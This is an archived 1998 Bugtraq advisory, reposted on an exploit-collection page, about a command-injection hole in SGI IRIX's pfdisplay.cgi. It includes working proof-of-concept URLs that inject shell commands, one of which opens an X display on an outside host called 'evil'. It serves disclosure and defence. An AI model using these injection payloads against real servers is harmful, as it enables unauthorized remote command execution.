Yet another SGI pfdispaly CGI hole
| Description: | As has been demonstrated many times, SGI CANNOT write secure CGI scripts. Nor can they write secure setuid programs. They fixed the last pfdisplay.cgi hole, but the new version is still quite buggy -- as this post demonstrates. |
| Author: | "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES> |
| Compromise: | run arbitrary commands remotely as the UID running the webserver |
| Vulnerable Systems: | SGI IRIX 6.2 using the performer_tools CGIs. |
| Date: | 7 April 1998 |
| Notes: | I honestly believe default SGI security is as bad as default Windows NT security. That is sad. |
Date: Tue, 7 Apr 1998 03:16:01 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: perfomer_tools again
Hi
There is already a patch from SGI to the pfdispaly.cgi
'../..' bug.
But it seems it fixes only that problem, without checking
the rest of the code for similar vulnerabilities, so even
after patch 3018 (04/01/98) you can try:
$ lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
uname -a\| file
IRIX victim 6.2 03131015 IP22
or
$ lynx -dump \
http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'
(You probably will notice this exploit is similar to that
one on 'wrap'; it's nice to find that sometimes reusing
code does work)
The fix is easy (for this particular problem); so it's left
to the reader.
Anyway, if you're using SGI cgi's you should consider
limiting the access to your domain...
--
J.A. Gutierrez So be easy and free
when you're drinking with me
I'm a man you don't meet every day
finger me for PGP (the pogues)
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
